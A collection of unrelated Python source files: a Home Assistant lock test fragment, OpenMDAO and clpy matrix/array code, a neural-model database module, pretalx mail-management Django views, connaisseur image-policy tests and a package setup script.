    assert hass.states.get(SCHLAGE_BE469_LOCK_ENTITY).state == STATE_LOCKED

    client.async_send_command.reset_mock()

    # Test unlocking (same valueId, but writing targetMode = 0)
    await hass.services.async_call(
        LOCK_DOMAIN,
        SERVICE_UNLOCK,
        {ATTR_ENTITY_ID: SCHLAGE_BE469_LOCK_ENTITY},
        blocking=True,
    )
    assert len(client.async_send_command.call_args_list) == 1
    args = client.async_send_command.call_args[0][0]
    assert args["command"] == "node.set_value"
    assert args["nodeId"] == 20
    assert args["valueId"] == {
        "commandClassName": "Door Lock",
        "commandClass": 98,
        "endpoint": 0,
        "property": "targetMode",
        "propertyName": "targetMode",
        "metadata": {
            "type": "number",
            "readable": True,
            "writeable": True,
            "min": 0,
            "max": 255,
            "label": "Target lock mode",
            "states": {
                "0": "Unsecured",
                "1": "UnsecuredWithTimeout",
                "16": "InsideUnsecured",
                "17": "InsideUnsecuredWithTimeout",
                "32": "OutsideUnsecured",
                "33": "OutsideUnsecuredWithTimeout",
                "254": "Unknown",
                "255": "Secured",
            },
        },
    }
    assert args["value"] == 0
|
nilq/baby-python
|
python
|
"""Define the CSRmatrix class."""
import numpy as np
from scipy.sparse import coo_matrix
from six import iteritems
from openmdao.matrices.coo_matrix import COOMatrix
class CSRMatrix(COOMatrix):
    """
    Sparse matrix in Compressed Row Storage format.

    Builds on COOMatrix: the COO triplets are pre-sorted into row-major order
    so that the CSR conversion keeps the data array in the same order, letting
    the per-submatrix update indices remain valid after conversion.
    """

    def _build(self, num_rows, num_cols):
        """
        Allocate the matrix.

        Parameters
        ----------
        num_rows : int
            number of rows in the matrix.
        num_cols : int
            number of cols in the matrix.
        """
        data, rows, cols = self._build_sparse(num_rows, num_cols)

        # get a set of indices that sorts into row major order
        srtidxs = np.lexsort((cols, rows))

        data = data[srtidxs]
        rows = rows[srtidxs]
        cols = cols[srtidxs]

        # now sort these back into ascending order (our original stacked order)
        # so in _update_submat() we can just extract the individual index
        # arrays that will map each block into the combined data array.
        revidxs = np.argsort(srtidxs)

        metadata = self._metadata
        for key, (ind1, ind2, idxs, jac_type, factor) in iteritems(metadata):
            if idxs is None:
                metadata[key] = (revidxs[ind1:ind2], jac_type, factor)
            else:
                # apply the reverse index to each part of revidxs so that
                # we can avoid copying the index array during updates.
                metadata[key] = (revidxs[ind1:ind2][np.argsort(idxs)],
                                 jac_type, factor)

        # data array for the CSR will be the same as for the COO since
        # it was already in sorted order.
        coo = coo_matrix((data, (rows, cols)), shape=(num_rows, num_cols))
        coo_data_size = coo.data.size
        self._matrix = coo.tocsr()

        # make sure data size is the same between coo and csr, else indexing is
        # messed up. tocsr() sums duplicate (row, col) entries, which would
        # shrink the data array and silently break the index mapping above.
        if coo_data_size != self._matrix.data.size:
            raise ValueError("CSR matrix data contains duplicate row/col entries. "
                             "This would break internal indexing.")
|
nilq/baby-python
|
python
|
# TODO: ext to __init__
from uuid import UUID
from typing import Union
import io
import torch
from neuroAPI.database.models import NeuralModelMetrics, MetricType, NeuralModel, Deposit, CrossValidation
from neuroAPI.neuralmodule.metrics import Metric
from neuroAPI.neuralmodule.network import NeuralNetwork as _NeuralNetwork
# Process-wide memo caches for database id lookups:
#   metric name -> metric id, and model id -> {rock index -> rock id}.
# No eviction logic exists in this module; entries live for the process.
_METRIC_ID_BUFFER: dict[str, UUID] = {}
_ROCK_ID_BUFFER: dict[UUID, dict[int, UUID]] = {}
class NeuralNetwork(NeuralModel, _NeuralNetwork):
    """Database-backed neural network.

    Combines the ORM entity (NeuralModel) with the torch-based network
    (_NeuralNetwork) and records deposit / block-size / epoch metadata.
    """

    def __init__(self, output_count: int, deposit: Deposit, block_size: float, max_epochs: int,
                 cross_validation: CrossValidation = None, *args, **kwargs):
        # BUG FIX: validation used `assert`, which is stripped under
        # `python -O`, with TypeError instances abused as assert messages.
        # Raise the intended TypeError explicitly instead. isinstance() also
        # accepts subclasses, which `type(x) == T` wrongly rejected.
        if not isinstance(deposit, Deposit):
            raise TypeError(f'type(`deposit`) == {type(deposit)}. '
                            'Expected neuroAPI.database.models.Deposit')
        if cross_validation and not isinstance(cross_validation, CrossValidation):
            raise TypeError(f'type(`cross_validation`) == {type(cross_validation)}. '
                            'Expected neuroAPI.database.models.CrossValidation')
        try:
            block_size = float(block_size)
        except ValueError:
            raise ValueError('`block_size` is not float-able')
        try:
            max_epochs = int(max_epochs)
        except ValueError:
            raise ValueError('`max_epochs` is not int-able')
        NeuralModel.__init__(self, *args, **kwargs)  # TODO: research about super() and refactor 4 flexibility
        _NeuralNetwork.__init__(self, output_count)  # +
        self.deposit_id = deposit.id
        self.block_size = block_size
        self.max_epochs = max_epochs
        if cross_validation:
            self.cross_validation_id = cross_validation.id

    def save(self):
        """Serialize the torch model into ``self.dump`` as raw bytes."""
        buff = io.BytesIO()
        torch.save(self, buff)
        buff.seek(0)
        self.dump = buff.read()
        buff.close()
class PYCMMetric(NeuralModelMetrics, Metric):
    """Metric record persisted to the database.

    Database id lookups are memoized in the module-level buffers
    _METRIC_ID_BUFFER / _ROCK_ID_BUFFER.
    """

    def __init__(self, name: str, metric_type: MetricType, value: Union[float, int, str], epoch: int,
                 neural_model: NeuralNetwork, rock_index: int = None, *args, **kwargs):
        # BUG FIX: validation used `assert` (stripped under `python -O`) with
        # TypeError instances abused as assert messages; raise explicitly.
        if not isinstance(metric_type, MetricType):
            raise TypeError('`metric_type` is not from `MetricType` enum')
        if type(value) not in [float, int, str]:
            raise TypeError(f'type(`value`) == {type(value)}. '
                            'Expected Union[float, int, str]')
        if not isinstance(neural_model, NeuralNetwork):
            raise TypeError(f'type(`neural_model`) == {type(neural_model)}. '
                            'Expected neuroAPI.neuralmodule.ext.NeuralNetwork')
        NeuralModelMetrics.__init__(self, *args, **kwargs)  # TODO: research about super() and refactor 4 flexibility
        Metric.__init__(self, name=name, value=value)  # +
        self.name = name
        self.neural_model_id = neural_model.id
        self.metric_id = self.__get_metric_id(metric_type)
        try:
            self.epoch = int(epoch)
        except ValueError:
            raise ValueError('`epoch` is not int-able')
        # BUG FIX: was `if rock_index:`, which skipped the lookup for the
        # legitimate rock index 0.
        if rock_index is not None:
            self.rock_id = self.__get_rock_id(rock_index, neural_model)
        self.value = self._value

    def __get_metric_id(self, metric_type: MetricType) -> UUID:
        """Return the metric id for ``self.name``, creating it on first use."""
        try:
            return _METRIC_ID_BUFFER[self.name]
        except KeyError:
            idx = self._get_create_metric(self.name, metric_type)
            _METRIC_ID_BUFFER[self.name] = idx
            return idx

    def __get_rock_id(self, rock_index: int, neural_model: NeuralNetwork) -> UUID:
        """Return the rock id for (model, rock_index), memoized per model."""
        try:
            return _ROCK_ID_BUFFER[neural_model.id][rock_index]
        except KeyError:
            idx = self._get_rock_id(rock_index, neural_model.deposit_id)
            if not isinstance(idx, UUID):
                raise Exception(f'no rock with index {rock_index} '
                                f'for deposit {neural_model.deposit_id} in database')
            # setdefault replaces the nested try/except insertion dance
            _ROCK_ID_BUFFER.setdefault(neural_model.id, {})[rock_index] = idx
            return idx

    @staticmethod
    def _calculate(pred, true) -> float:
        # Persistence-only class: metric values are computed upstream and
        # passed in; there is nothing to calculate here.
        raise NotImplementedError
|
nilq/baby-python
|
python
|
from django.contrib import messages
from django.shortcuts import get_object_or_404, redirect
from django.utils.functional import cached_property
from django.utils.translation import ugettext_lazy as _
from django.views.generic import FormView, ListView, TemplateView, View
from pretalx.common.mixins.views import (
ActionFromUrl, Filterable, PermissionRequired, Sortable,
)
from pretalx.common.views import CreateOrUpdateView
from pretalx.mail.context import get_context_explanation
from pretalx.mail.models import MailTemplate, QueuedMail
from pretalx.orga.forms.mails import MailDetailForm, MailTemplateForm, WriteMailForm
from pretalx.person.models import User
class OutboxList(PermissionRequired, Sortable, Filterable, ListView):
    """Paginated, filterable list of queued (not yet sent) mails."""

    model = QueuedMail
    context_object_name = 'mails'
    template_name = 'orga/mails/outbox_list.html'
    default_filters = ('to__icontains', 'subject__icontains')
    filterable_fields = ('to', 'subject')
    sortable_fields = ('to', 'subject')
    paginate_by = 25
    permission_required = 'orga.view_mails'

    def get_permission_object(self):
        return self.request.event

    def get_queryset(self):
        # Unsent mails in insertion order, then user-driven filter + sort.
        pending = self.request.event.queued_mails.filter(sent__isnull=True).order_by('id')
        return self.sort_queryset(self.filter_queryset(pending))
class SentMail(PermissionRequired, Sortable, Filterable, ListView):
    """Paginated, filterable list of already-sent mails, newest first."""

    model = QueuedMail
    context_object_name = 'mails'
    template_name = 'orga/mails/sent_list.html'
    default_filters = ('to__icontains', 'subject__icontains')
    filterable_fields = ('to', 'subject')
    sortable_fields = ('to', 'subject', 'sent')
    paginate_by = 25
    permission_required = 'orga.view_mails'

    def get_permission_object(self):
        return self.request.event

    def get_queryset(self):
        # Sent mails, most recent first, then user-driven filter + sort.
        delivered = self.request.event.queued_mails.filter(sent__isnull=False).order_by('-sent')
        return self.sort_queryset(self.filter_queryset(delivered))
class OutboxSend(PermissionRequired, TemplateView):
    """Send mails from the outbox.

    With a pk in the URL, the single mail is sent immediately during
    dispatch(); without one, a confirmation page is shown and POST sends
    every unsent mail.
    """
    permission_required = 'orga.send_mails'
    template_name = 'orga/mails/confirm.html'

    def get_permission_object(self):
        return self.request.event

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        context['question'] = _('Do you really want to send {count} mails?').format(
            count=self.queryset.count()
        )
        return context

    def dispatch(self, request, *args, **kwargs):
        # Single-mail mode: act right away and redirect, skipping the
        # confirmation template entirely.
        if 'pk' in self.kwargs:
            try:
                mail = self.request.event.queued_mails.get(pk=self.kwargs.get('pk'))
            except QueuedMail.DoesNotExist:
                messages.error(
                    request,
                    _(
                        'This mail either does not exist or cannot be discarded because it was sent already.'
                    ),
                )
                return redirect(self.request.event.orga_urls.outbox)
            if mail.sent:
                messages.error(request, _('This mail had been sent already.'))
            else:
                mail.send()
                mail.log_action(
                    'pretalx.mail.sent', person=self.request.user, orga=True
                )
                messages.success(request, _('The mail has been sent.'))
            return redirect(self.request.event.orga_urls.outbox)
        return super().dispatch(request, *args, **kwargs)

    @cached_property
    def queryset(self):
        # All unsent mails, optionally narrowed to the pk from the URL.
        qs = self.request.event.queued_mails.filter(sent__isnull=True)
        if 'pk' in self.kwargs:
            qs = qs.filter(pk=self.kwargs['pk'])
        return qs

    def post(self, request, *args, **kwargs):
        # Bulk mode: POST arrives from the confirmation page.
        qs = self.queryset
        count = qs.count()
        for mail in qs:
            mail.log_action('pretalx.mail.sent', person=self.request.user, orga=True)
            mail.send()
        messages.success(
            request, _('{count} mails have been sent.').format(count=count)
        )
        return redirect(self.request.event.orga_urls.outbox)
class OutboxPurge(PermissionRequired, TemplateView):
    """Delete mails from the outbox.

    With a pk in the URL, the single (unsent) mail is deleted immediately in
    dispatch(); without one, a confirmation page is shown and POST purges all
    unsent mails.
    """
    permission_required = 'orga.purge_mails'
    template_name = 'orga/mails/confirm.html'

    def get_permission_object(self):
        # Permission is checked against the specific mail when a pk is given,
        # against the event for bulk purges.
        if 'pk' in self.kwargs:
            return self.request.event.queued_mails.filter(
                sent__isnull=True, pk=self.kwargs.get('pk')
            ).first()
        return self.request.event

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        context['question'] = _('Do you really want to purge {count} mails?').format(
            count=self.queryset.count()
        )
        return context

    def dispatch(self, request, *args, **kwargs):
        # Single-mail mode: delete right away and redirect, skipping the
        # confirmation template.
        if 'pk' in self.kwargs:
            try:
                mail = self.request.event.queued_mails.get(
                    sent__isnull=True, pk=self.kwargs.get('pk')
                )
            except QueuedMail.DoesNotExist:
                messages.error(
                    request,
                    _(
                        'This mail either does not exist or cannot be discarded because it was sent already.'
                    ),
                )
                return redirect(self.request.event.orga_urls.outbox)
            if mail.sent:
                messages.error(request, _('This mail had been sent already.'))
            else:
                mail.log_action(
                    'pretalx.mail.delete', person=self.request.user, orga=True
                )
                mail.delete()
                messages.success(request, _('The mail has been deleted.'))
            # NOTE(review): uses request.event where the rest of the class
            # uses self.request.event -- presumably the same object; confirm.
            return redirect(request.event.orga_urls.outbox)
        return super().dispatch(request, *args, **kwargs)

    @cached_property
    def queryset(self):
        # All unsent mails, optionally narrowed to the pk from the URL.
        qs = self.request.event.queued_mails.filter(sent__isnull=True)
        if 'pk' in self.kwargs:
            qs = qs.filter(pk=self.kwargs['pk'])
        return qs

    def post(self, request, *args, **kwargs):
        # Bulk mode: POST arrives from the confirmation page.
        qs = self.queryset
        count = qs.count()
        qs.delete()
        messages.success(
            request, _('{count} mails have been purged.').format(count=count)
        )
        return redirect(self.request.event.orga_urls.outbox)
class MailDetail(PermissionRequired, ActionFromUrl, CreateOrUpdateView):
    """View/edit a single outbox mail; the 'send' form action also sends it."""
    model = QueuedMail
    form_class = MailDetailForm
    template_name = 'orga/mails/outbox_form.html'
    write_permission_required = 'orga.edit_mails'
    permission_required = 'orga.view_mails'

    def get_object(self) -> QueuedMail:
        return self.request.event.queued_mails.filter(pk=self.kwargs.get('pk')).first()

    def get_success_url(self):
        return self.object.event.orga_urls.outbox

    def form_valid(self, form):
        form.instance.event = self.request.event
        # Already-sent mails are immutable: bail out before saving anything.
        if form.instance.sent is not None:
            messages.error(
                self.request,
                _('The email has already been sent, you cannot edit it anymore.'),
            )
            return redirect(self.get_success_url())
        result = super().form_valid(form)
        if form.has_changed():
            action = 'pretalx.mail.' + ('update' if self.object else 'create')
            form.instance.log_action(action, person=self.request.user, orga=True)
        # The submitted button's value distinguishes plain save from
        # save-and-send; default to a plain save.
        action = form.data.get('form', 'save')
        if action == 'save':
            messages.success(
                self.request,
                _(
                    'The email has been saved. When you send it, the updated text will be used.'
                ),
            )
        elif action == 'send':
            form.instance.send()
            messages.success(self.request, _('The email has been sent.'))
        return result
class MailCopy(PermissionRequired, View):
    """Duplicate a queued/sent mail into a fresh editable draft."""

    permission_required = 'orga.send_mails'

    def get_object(self) -> QueuedMail:
        return get_object_or_404(
            self.request.event.queued_mails, pk=self.kwargs.get('pk')
        )

    def dispatch(self, request, *args, **kwargs):
        draft = self.get_object().copy_to_draft()
        messages.success(request, _('The mail has been copied, you can edit it now.'))
        return redirect(draft.urls.edit)
class ComposeMail(PermissionRequired, FormView):
    """Compose a mail to a set of recipients and queue one copy per address.

    Recipients are resolved from the form's 'recipients' choices: 'reviewers'
    expands to reviewer-team members, 'selected_submissions' to the speakers
    of the chosen submissions, and any other value is treated as a submission
    state filter.
    """
    form_class = WriteMailForm
    template_name = 'orga/mails/send_form.html'
    permission_required = 'orga.send_mails'

    def get_permission_object(self):
        return self.request.event

    def get_form_kwargs(self):
        kwargs = super().get_form_kwargs()
        kwargs['event'] = self.request.event
        # Optional prefill from a mail template referenced in the query string
        if 'template' in self.request.GET:
            template = MailTemplate.objects.filter(
                pk=self.request.GET.get('template')
            ).first()
            if template:
                initial = kwargs.get('initial', dict())
                initial['subject'] = template.subject
                initial['text'] = template.text
                initial['reply_to'] = template.reply_to
                initial['bcc'] = template.bcc
                kwargs['initial'] = initial
        # Optional preselection of a single submission's speakers
        if 'submission' in self.request.GET:
            submission = self.request.event.submissions.filter(
                code=self.request.GET.get('submission')
            ).first()
            if submission:
                initial = kwargs.get('initial', dict())
                initial['recipients'] = 'selected_submissions'
                initial['submissions'] = submission.code
                kwargs['initial'] = initial
        return kwargs

    def get_success_url(self):
        return self.request.event.orga_urls.compose_mails

    def form_valid(self, form):
        # Collect addresses in a set so nobody receives duplicates even when
        # they match several recipient groups.
        email_set = set()
        for recipient in form.cleaned_data.get('recipients'):
            if recipient == 'reviewers':
                mails = (
                    User.objects.filter(
                        teams__in=self.request.event.teams.filter(is_reviewer=True)
                    )
                    .distinct()
                    .values_list('email', flat=True)
                )
            else:
                if recipient == 'selected_submissions':
                    submission_filter = {
                        'code__in': form.cleaned_data.get('submissions')
                    }
                else:
                    submission_filter = {'state': recipient}  # e.g. "submitted"

                mails = self.request.event.submissions.filter(
                    **submission_filter
                ).values_list('speakers__email', flat=True)
            email_set.update(mails)

        for email in email_set:
            QueuedMail.objects.create(
                event=self.request.event,
                to=email,
                # NOTE(review): dict.get only falls back to event.email when
                # the 'reply_to' key is absent, not when it is empty -- confirm
                # that is the intended behaviour.
                reply_to=form.cleaned_data.get('reply_to', self.request.event.email),
                cc=form.cleaned_data.get('cc'),
                bcc=form.cleaned_data.get('bcc'),
                subject=form.cleaned_data.get('subject'),
                text=form.cleaned_data.get('text'),
            )
        messages.success(
            self.request,
            _(
                'The emails have been saved to the outbox – you can make individual changes there or just send them all.'
            ),
        )
        return super().form_valid(form)
class TemplateList(PermissionRequired, TemplateView):
    """Overview of the event's four fixed mail templates plus custom ones."""

    template_name = 'orga/mails/template_list.html'
    permission_required = 'orga.view_mail_templates'

    def get_permission_object(self):
        return self.request.event

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        event = self.request.event
        # The fixed templates, keyed by the context name the template expects.
        fixed = [
            ('accept', event.accept_template),
            ('ack', event.ack_template),
            ('reject', event.reject_template),
            ('update', event.update_template),
        ]
        for key, template in fixed:
            context[key] = MailTemplateForm(
                instance=template, read_only=True, event=event
            )
        # Everything not covered above is shown as a custom template.
        used_pks = [template.pk for _, template in fixed if template and template.pk]
        context['other'] = [
            MailTemplateForm(instance=template, read_only=True, event=event)
            for template in event.mail_templates.exclude(pk__in=used_pks)
        ]
        return context
class TemplateDetail(PermissionRequired, ActionFromUrl, CreateOrUpdateView):
    """Create or edit a mail template.

    Fixed event templates additionally expose the documented placeholder
    variables in the context.
    """
    model = MailTemplate
    form_class = MailTemplateForm
    template_name = 'orga/mails/template_form.html'
    permission_required = 'orga.view_mail_templates'
    write_permission_required = 'orga.edit_mail_templates'

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        template = self.object
        # Placeholder docs only apply to the event's fixed templates
        if template and template in template.event.fixed_templates:
            context['placeholders'] = get_context_explanation()
        return context

    def get_form_kwargs(self):
        kwargs = super().get_form_kwargs()
        kwargs['event'] = self.request.event
        return kwargs

    def get_object(self) -> MailTemplate:
        return MailTemplate.objects.filter(
            event=self.request.event, pk=self.kwargs.get('pk')
        ).first()

    @cached_property
    def object(self):
        return self.get_object()

    def get_permission_object(self):
        return self.object or self.request.event

    def get_success_url(self):
        return self.request.event.orga_urls.mail_templates

    def form_valid(self, form):
        form.instance.event = self.request.event
        if form.has_changed():
            action = 'pretalx.mail_template.' + ('update' if self.object else 'create')
            form.instance.log_action(action, person=self.request.user, orga=True)
        # Consistency fix: this was the only user-facing message in the module
        # not wrapped in _() for translation.
        messages.success(
            self.request,
            _(
                'The template has been saved - note that already pending emails that are based on this template will not be changed!'
            ),
        )
        return super().form_valid(form)
class TemplateDelete(PermissionRequired, View):
    """Delete a mail template after logging the action."""

    permission_required = 'orga.edit_mail_templates'

    def get_object(self) -> MailTemplate:
        return get_object_or_404(
            MailTemplate.objects.all(),
            event=self.request.event,
            pk=self.kwargs.get('pk'),
        )

    def dispatch(self, request, *args, **kwargs):
        # NOTE(review): the parent dispatch is invoked but its response is
        # discarded -- presumably only for the permission-check side effects
        # of the mixin chain; confirm before restructuring.
        super().dispatch(request, *args, **kwargs)
        template = self.get_object()
        template.log_action(
            'pretalx.mail_template.delete', person=self.request.user, orga=True
        )
        template.delete()
        # Consistency fix: wrap the user-facing message in _() like every
        # other message in this module.
        messages.success(request, _('The template has been deleted.'))
        return redirect(request.event.orga_urls.mail_templates)
|
nilq/baby-python
|
python
|
import pytest
import connaisseur.policy
from connaisseur.image import Image
from connaisseur.exceptions import BaseConnaisseurException
# Reference image specs: the same image addressed by tag and by digest.
match_image_tag = "docker.io/securesystemsengineering/sample:v1"
match_image_digest = (
    "docker.io/securesystemsengineering/sample@sha256:"
    "1388abc7a12532836c3a81bdb0087409b15208f5aeba7a87aedcfd56d637c145"
)
# Image-policy fixture shared by the tests below.
# NOTE(review): this is a module-level mutable dict and test_image_pol_error
# mutates it in place, so test outcomes can depend on execution order --
# confirm that is acceptable.
policy = {
    "rules": [
        {"pattern": "*:*", "verify": True, "delegations": ["phbelitz", "chamsen"]},
        {"pattern": "docker.io/*:*", "verify": True, "delegations": ["phbelitz"]},
        {"pattern": "k8s.gcr.io/*:*", "verify": False},
        {"pattern": "gcr.io/*:*", "verify": False},
        {
            "pattern": "docker.io/securesystemsengineering/*:*",
            "verify": True,
            "delegations": ["someuserthatdidnotsign"],
        },
        {
            "pattern": "docker.io/securesystemsengineering/sample",
            "verify": True,
            "delegations": ["phbelitz", "chamsen"],
        },
        {"pattern": "docker.io/securesystemsengineering/sample:v4", "verify": False},
        {
            "pattern": "docker.io/securesystemsengineering/connaisseur:*",
            "verify": False,
        },
        {
            "pattern": "docker.io/securesystemsengineering/sample-san-sama",
            "verify": True,
        },
    ]
}
@pytest.fixture
def pol():
    # Hand the module itself to tests so they can reach Match / ImagePolicy.
    return connaisseur.policy
@pytest.fixture
def mock_policy(monkeypatch):
    """Patch ImagePolicy to load the module-level ``policy`` dict instead of
    the deployment's configured policy."""
    def get_policy():
        return policy

    # NOTE(review): the `monkeypatch` fixture is requested but unused -- these
    # assignments patch the class globally and are never reverted, so they
    # leak into subsequent tests; confirm whether monkeypatch.setattr was
    # intended.
    connaisseur.policy.ImagePolicy.get_image_policy = staticmethod(get_policy)
    connaisseur.policy.ImagePolicy.JSON_SCHEMA_PATH = "res/policy_schema.json"
@pytest.mark.parametrize(
    "rule, image, comp_count, comp_len, pre_len",
    [
        ("", "", 1, [2], [0]),
        ("*:*", match_image_tag, 1, [3], [0]),
        ("doc*/*", match_image_tag, 2, [4, 3], [3, 0]),
        ("*/sec*/*:*", match_image_tag, 3, [1, 4, 3], [0, 3, 0]),
        ("*@sha256:*", match_image_digest, 1, [10], [0]),
    ],
)
def test_match(
    pol, rule: str, image: str, comp_count: int, comp_len: list, pre_len: list
):
    """Match keeps the raw rule as key, normalizes tag-less rules, and
    precomputes the per-component lengths used for specificity comparison."""
    match = pol.Match(rule, image)
    # A rule without an explicit tag is padded with the wildcard tag ':*'
    rule_with_tag = rule if ":" in rule else f"{rule}:*"
    assert match.key == rule
    assert match.pattern == rule_with_tag
    assert match.component_count == comp_count
    assert match.component_lengths == comp_len
    assert match.prefix_lengths == pre_len
@pytest.mark.parametrize("rule, exist", [("", False), ("*", True)])
def test_match_bool(pol, rule: str, exist: bool):
    """A Match is falsy exactly when constructed from an empty rule."""
    match = pol.Match(rule, "image")
    assert bool(match) == exist
@pytest.mark.parametrize(
    "rule1, rule2, image",
    [
        ("", "*", match_image_tag),
        ("*", "*:*", match_image_tag),
        ("*:*", "*/*", match_image_tag),
        ("*/*", "docker*/*", match_image_tag),
        ("docker*/*", "*/*/*", match_image_tag),
        ("*/*/image:v1", "*/sam*/*", match_image_tag),
    ],
)
def test_match_compare(pol, rule1: str, rule2: str, image: str):
    """compare() returns the more specific of the two matches; every pair in
    the parameter list is ordered so that rule2 is expected to win."""
    m1 = pol.Match(rule1, image)
    m2 = pol.Match(rule2, image)
    fighters = [m1, m2]
    assert m1.compare(m2) == fighters[1]
def test_image_pol(pol, mock_policy):
    """ImagePolicy loads (and schema-validates) the mocked module policy."""
    p = pol.ImagePolicy()
    assert p.policy == policy
@pytest.mark.parametrize(
    "image, rule",
    [
        (
            "image:tag",
            {"pattern": "docker.io/*:*", "verify": True, "delegations": ["phbelitz"]},
        ),
        (
            "reg.io/image:tag",
            {"pattern": "*:*", "verify": True, "delegations": ["phbelitz", "chamsen"]},
        ),
        ("k8s.gcr.io/path/image", {"pattern": "k8s.gcr.io/*:*", "verify": False}),
        (
            "docker.io/securesystemsengineering/sample:v4",
            {
                "pattern": "docker.io/securesystemsengineering/sample:v4",
                "verify": False,
            },
        ),
    ],
)
def test_get_matching_rule(pol, mock_policy, image: str, rule: dict):
    """The most specific policy rule wins for each image reference."""
    p = pol.ImagePolicy()
    assert p.get_matching_rule(Image(image)) == rule
def test_get_matching_rule_error(pol, mock_policy):
    """Without the '*:*' catch-all rule, an unmatched image raises."""
    p = pol.ImagePolicy()
    # Drop the first (catch-all) rule so nothing matches the image below
    p.policy["rules"] = p.policy["rules"][1:]
    with pytest.raises(BaseConnaisseurException) as err:
        p.get_matching_rule(Image("reg.io/image"))
    assert (
        "no matching rule for image " '"reg.io/image:latest" could be found.'
    ) in str(err.value)
def test_image_pol_error(pol, mock_policy):
    """A policy that fails schema validation raises on construction."""
    # NOTE(review): `list += dict` extends the list by the dict's *keys*, so
    # this appends the string "pattern", not the rule {"pattern": "***"}.
    # Either value makes the policy schema-invalid, so the test passes, but
    # confirm which was intended. This also permanently mutates the shared
    # module-level `policy`.
    policy["rules"] += {"pattern": "***"}
    with pytest.raises(BaseConnaisseurException) as err:
        assert pol.ImagePolicy()
    assert "invalid format for image policy." in str(err.value)
|
nilq/baby-python
|
python
|
from clpy import core
def array(obj, dtype=None, copy=True, order='K', subok=False, ndmin=0):
    """Creates an array on the current device.

    This function currently does not support the ``order`` and ``subok``
    options.

    Args:
        obj: :class:`clpy.ndarray` object or any other object that can be
            passed to :func:`numpy.array`.
        dtype: Data type specifier.
        copy (bool): If ``False``, this function returns ``obj`` if possible.
            Otherwise this function always returns a new array.
        order ({'C', 'F', 'A', 'K'}): Row-major (C-style) or column-major
            (Fortran-style) order.
            When ``order`` is 'A', it uses 'F' if ``a`` is column-major and
            uses 'C' otherwise.
            And when ``order`` is 'K', it keeps strides as closely as
            possible.
            If ``obj`` is :class:`numpy.ndarray`, the function returns 'C' or
            'F' order array.
        subok (bool): If True, then sub-classes will be passed-through,
            otherwise the returned array will be forced to be a base-class
            array (default).
        ndmin (int): Minimum number of dimensions. Ones are inserted to the
            head of the shape if needed.

    Returns:
        clpy.ndarray: An array on the current device.

    .. note::
       This method currently does not support ``subok`` argument.

    .. seealso:: :func:`numpy.array`
    """
    # Thin wrapper: all argument handling lives in the core implementation.
    return core.array(obj, dtype, copy, order, subok, ndmin)
def asarray(a, dtype=None):
    """Converts an object to array.

    This is equivalent to ``array(a, dtype, copy=False)``.
    This function currently does not support the ``order`` option.

    Args:
        a: The source object.
        dtype: Data type specifier. It is inferred from the input by default.

    Returns:
        clpy.ndarray: An array on the current device. If ``a`` is already on
        the device, no copy is performed.

    .. seealso:: :func:`numpy.asarray`
    """
    # copy=False: reuse ``a`` when it already lives on the device.
    return core.array(a, dtype, False)
def asanyarray(a, dtype=None):
    """Converts an object to array.

    This is currently equivalent to :func:`~clpy.asarray`, since there is no
    subclass of ndarray in CuPy. Note that the original
    :func:`numpy.asanyarray` returns the input array as is if it is an instance
    of a subtype of :class:`numpy.ndarray`.

    .. seealso:: :func:`clpy.asarray`, :func:`numpy.asanyarray`
    """
    # Identical to asarray because clpy has no ndarray subclasses.
    return core.array(a, dtype, False)
def ascontiguousarray(a, dtype=None):
    """Returns a C-contiguous array.

    Args:
        a (clpy.ndarray): Source array.
        dtype: Data type specifier.

    Returns:
        clpy.ndarray: If no copy is required, it returns ``a``. Otherwise, it
        returns a copy of ``a``.

    .. seealso:: :func:`numpy.ascontiguousarray`
    """
    # The core routine decides whether a copy is actually needed.
    return core.ascontiguousarray(a, dtype)
# TODO(okuta): Implement asmatrix
def copy(a, order='K'):
    """Creates a copy of a given array on the current device.

    This function allocates the new array on the current device. If the given
    array is allocated on the different device, then this function tries to
    copy the contents over the devices.

    Args:
        a (clpy.ndarray): The source array.
        order ({'C', 'F', 'A', 'K'}): Row-major (C-style) or column-major
            (Fortran-style) order.
            When `order` is 'A', it uses 'F' if `a` is column-major and
            uses `C` otherwise.
            And when `order` is 'K', it keeps strides as closely as
            possible.

    Returns:
        clpy.ndarray: The copy of ``a`` on the current device.

    See: :func:`numpy.copy`, :meth:`clpy.ndarray.copy`
    """
    # If the current device is different from the device of ``a``, then this
    # function allocates a new array on the current device, and copies the
    # contents over the devices.
    return a.copy(order=order)
# TODO(okuta): Implement frombuffer
# TODO(okuta): Implement fromfile
# TODO(okuta): Implement fromfunction
# TODO(okuta): Implement fromiter
# TODO(okuta): Implement fromstring
# TODO(okuta): Implement loadtxt
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
"""
Copyright 2021 DataDistillr Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pathlib import Path
from setuptools import setup, find_packages
# Directory containing this setup.py; used to locate README.md.
this_directory = Path(__file__).parent

# Package metadata handed to setuptools.setup() in main().
setup_args = dict(
    name='datadistillr',
    version='1.0.0',
    author='Charles Givre, Amanda Ha, Andrea Ha, Sanaa Mironov',
    author_email='charles@datadistillr.com',
    packages=find_packages(include=['datadistillr', 'datadistillr.*']),
    url='https://github.com/datadistillr/datadistillr-python-sdk',
    license="Apache",
    description='A Python SDK for interacting with datasets created on DataDistillr',
    # The README doubles as the PyPI long description.
    long_description = (this_directory / "README.md").read_text(encoding='utf-8'),
    long_description_content_type="text/markdown",
    install_requires=[
        "pandas",
        "requests",
        "urllib3"
    ],
    classifiers=[
        'Intended Audience :: Developers',
        'Intended Audience :: System Administrators',
        'Intended Audience :: Science/Research',
        'License :: OSI Approved :: Apache Software License',
        'Programming Language :: Python',
        'Programming Language :: Python :: 3',
        'Programming Language :: SQL',
        'Operating System :: OS Independent',
        'Topic :: Database'
    ]
)
def main():
    """
    Runs the setup of DataDistillr.

    :return: Nothing
    """
    setup(**setup_args)


# Allow direct execution: ``python setup.py <command>``.
if __name__ == '__main__':
    main()
|
nilq/baby-python
|
python
|
from .Body import Body
